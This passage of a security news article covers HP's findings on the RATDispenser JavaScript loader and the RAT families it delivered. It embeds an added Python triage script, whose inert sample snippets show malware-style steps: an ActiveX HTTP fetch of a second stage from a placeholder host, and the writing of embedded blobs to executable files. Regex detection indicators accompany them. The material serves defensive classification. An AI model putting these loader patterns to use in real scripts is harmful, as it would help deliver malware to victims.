The loader is highly evasive: at the time of the analysis it had only an 11% detection rate on VirusTotal. HP experts confirmed that it was employed to distribute at least eight RAT families during 2021 (STRRAT, WSHRAT, AdWind, Formbook, Remcos, Panda Stealer, GuLoader, and Ratty). The experts believe that the threat actors behind RATDispenser may be operating a malware-as-a-service model.
HP researchers ran a retrohunt over the last three months with this YARA rule and identified 155 RATDispenser samples belonging to three different variants. The experts also wrote a Python script to recover the final payload and discovered that:
- 145 of the 155 samples (94%) were droppers. Only 10 samples were downloaders that communicate over the network to download a secondary stage of malware.
- 8 malware families delivered as payloads
- All the payloads were remote access Trojans (RATs), keyloggers and information stealers
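The dropper-versus-downloader split above is the kind of triage a defender reproduces when bulk-classifying JavaScript loader samples. The following is an added example, not HP's extraction script and not taken from the article: it applies a simple static heuristic to a few constructed (non-malicious) JScript-like snippets and tallies the result the way the counts above are reported. The indicator patterns are assumptions chosen for illustration, not the rule HP used.

```python
import re
from collections import Counter

# Constructed sample texts standing in for loader scripts (not real malware).
# Each one either carries an embedded blob it writes to disk (dropper) or
# fetches a second stage over HTTP (downloader). The host names are placeholders.
SAMPLES = {
    "sample1.js": (
        'var p = "QUJDREVGR0hJSktMTU5PUFFS"; '
        'var f = new ActiveXObject("Scripting.FileSystemObject"); '
        'f.CreateTextFile("stage.exe");'
    ),
    "sample2.js": (
        'var x = new ActiveXObject("MSXML2.XMLHTTP"); '
        'x.open("GET", "http://placeholder.invalid/stage2", false); x.send();'
    ),
    "sample3.js": (
        'var s = new ActiveXObject("ADODB.Stream"); '
        's.Write(decode("UEsDBBQAAAAIAAAAIQAA")); s.SaveToFile("stage.jar");'
    ),
}

# Assumed indicators: network-capable COM objects and URLs mark a downloader,
# file-writing COM objects and long base64-looking literals mark a dropper.
NETWORK_INDICATORS = [
    r"MSXML2\.XMLHTTP",
    r"WinHttp\.WinHttpRequest",
    r"\.open\(\s*['\"]GET['\"]",
    r"https?://",
]
EMBED_INDICATORS = [
    r"Scripting\.FileSystemObject",
    r"ADODB\.Stream",
    r"SaveToFile",
    r"CreateTextFile",
    r"['\"][A-Za-z0-9+/=]{16,}['\"]",
]


def classify(script: str) -> str:
    """Label a loader script as 'downloader', 'dropper' or 'unknown'.

    A script that talks to the network is treated as a downloader even if it
    also embeds data, because the network stage is what a defender must block.
    """
    talks_to_network = any(re.search(p, script) for p in NETWORK_INDICATORS)
    writes_embedded = any(re.search(p, script) for p in EMBED_INDICATORS)
    if talks_to_network:
        return "downloader"
    if writes_embedded:
        return "dropper"
    return "unknown"


def summarize(samples: dict) -> dict:
    """Return {label: (count, percent_of_total)} over a sample set."""
    counts = Counter(classify(text) for text in samples.values())
    total = len(samples)
    return {label: (n, round(100 * n / total)) for label, n in counts.items()}


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(f"{name}: {classify(text)}")
    print(summarize(SAMPLES))
```

On a real corpus the obfuscation RATDispenser uses means the indicators would first have to be recovered by deobfuscating the script, which is what a payload-extraction step does before a heuristic like this becomes meaningful.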
STRRAT and WSHRAT accounted for 81% of the samples analyzed by the researchers. “Using each sample’s earliest scan result, on average the RATDispenser samples were only detected by 11% of available anti-virus engines, or eight engines in absolute numbers.”
HP researchers published a set of hashes, URLs, a YARA rule, and an extraction script in the HP Threat Research GitHub repository.
(SecurityAffairs – hacking, RATDispenser)